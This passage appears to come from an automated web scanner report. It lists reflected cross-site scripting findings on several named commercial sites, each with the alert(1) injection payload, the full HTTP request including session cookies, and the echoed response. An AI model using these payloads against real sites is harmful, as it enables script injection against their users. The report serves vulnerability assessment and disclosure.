User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092937570:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001:@E0I02h:@E0I; s_sq=msstotn%2Cmsstotnonly%2Cmsstotnmktenus%2Cmsstotncentroll%2Cmsstotnctmag%3D%2526pid%253Dtechnet%25253A/en-us/magazine/gg703766%2526pidt%253D1%2526oid%253Dhttp%25253A//technet.microsoft.com/en-us/magazine/ff426023.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 12898
Content-Type: application/x-javascript
ETag: 4333d9fde5edd64c06ec0c3e90339f31
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Content-Length: 12898
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:41:39 GMT
Date: Sat, 26 Mar 2011 01:41:39 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
,"boxId":"ctl00_Masthead_Search_SearchTextBox","btnId":"ctl00_Masthead_Search_SearchButton","focusOnInit":true,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=86&67fe9<img src=a onerror=alert(1)>e5797209df=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

5.43. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4445b'-alert(1)-'90d16fca36c was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.11407896876335144&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html4445b'-alert(1)-'90d16fca36c HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_148=1699-uid:439524AE836A5E4D157CECA302E891CB; KRTBCOOKIE_204=3579-06bdea66-433e-11e0-b98e-00259009a9e4; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.806_1331731734.1811_1395276815.1647_1302396826.540_1395425654.1985_1304870735

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:38 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 565

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
op:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.11407896876335144&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html4445b'-alert(1)-'90d16fca36c">
...[SNIP]...

5.44. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f79c'-alert(1)-'99a5d4b72c7 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.114078968763351449f79c'-alert(1)-'99a5d4b72c7&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_148=1699-uid:439524AE836A5E4D157CECA302E891CB; KRTBCOOKIE_204=3579-06bdea66-433e-11e0-b98e-00259009a9e4; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.806_1331731734.1811_1395276815.1647_1302396826.540_1395425654.1985_1304870735

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:27 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 565

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
height="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.114078968763351449f79c'-alert(1)-'99a5d4b72c7&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html">
...[SNIP]...

5.45. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into an HTML comment. The payload 80609--><script>alert(1)</script>1ecec661735 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shavlik/index.cfm?m=1009&pg=697&h=80609--><script>alert(1)</script>1ecec661735&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 80609--><script>alert(1)</script>1ecec661735|697 -- -->
...[SNIP]...

5.46. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 8770d<script>alert(1)</script>23979558cba was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shavlik/index.cfm?m=1009&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f90628770d<script>alert(1)</script>23979558cba&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
</script>e58fc9f90628770d<script>alert(1)</script>23979558cba|697 -- -->
...[SNIP]...

5.47. http://my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /cart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ef24</script><script>alert(1)</script>8b8d97eb0ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001&4ef24</script><script>alert(1)</script>8b8d97eb0ba=1 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:50:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 39857
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
ecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001&4ef24</script><script>alert(1)</script>8b8d97eb0ba=1';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkcheck
...[SNIP]...

5.48. http://my-happyfeet.com/cart.asp [rp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the rp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdeac</script><script>alert(1)</script>ad279ee61f3 was submitted in the rp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001fdeac</script><script>alert(1)</script>ad279ee61f3 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:49:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 39841
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
hecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001fdeac</script><script>alert(1)</script>ad279ee61f3';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkchecked
...[SNIP]...

5.49. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 4c995%0aalert(1)//39aa684e7cf was submitted in the url parameter. This input was echoed as 4c995
alert(1)//39aa684e7cf
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml4c995%0aalert(1)//39aa684e7cf&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1300632449.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.2120303763.1300632449.1300817215.1301068080.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sat, 26 Mar 2011 11:52:00 GMT
Expires: Sat, 26 Mar 2011 11:52:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 116
Server: GSE

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml4c995
alert(1)//39aa684e7cf
. HTTP error 400

5.50. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c655e<script>alert(1)</script>3c3794184e6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9?callback=BF_PARTNER.gate_responsec655e<script>alert(1)</script>3c3794184e6&cb=931 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 70
Cache-Control: max-age=3600
Expires: Sat, 26 Mar 2011 21:36:24 GMT
Date: Sat, 26 Mar 2011 20:36:24 GMT
Connection: close

BF_PARTNER.gate_responsec655e<script>alert(1)</script>3c3794184e6(0);

5.51. https://secure.avangate.com/order/cart.php [CART_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4dd"><script>alert(1)</script>3aab9aad0e510441a was submitted in the CART_ID parameter. This input was echoed as ad4dd\"><script>alert(1)</script>3aab9aad0e510441a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03ad4dd"><script>alert(1)</script>3aab9aad0e510441a&qty0=1&prod0=1523013&submit_type=cross_selling&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:14:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03ad4dd\"><script>alert(1)</script>3aab9aad0e510441a" target="_blank">
...[SNIP]...

5.52. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1796"><script>alert(1)</script>4ed955d9ca569fbd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1796\"><script>alert(1)</script>4ed955d9ca569fbd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=28d9066c6ec8a32ef621f59af80/b1796"><script>alert(1)</script>4ed955d9ca569fbd452e03&qty0=1&prod0=1523013&submit_type=cross_selling&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:14:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af80/b1796\"><script>alert(1)</script>4ed955d9ca569fbd452e03" target="_blank">
...[SNIP]...

5.53. https://secure.avangate.com/order/checkout.php [CART_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e831e"><script>alert(1)</script>4dbe77a7b98 was submitted in the CART_ID parameter. This input was echoed as e831e\"><script>alert(1)</script>4dbe77a7b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03e831e"><script>alert(1)</script>4dbe77a7b98 HTTP/1.1
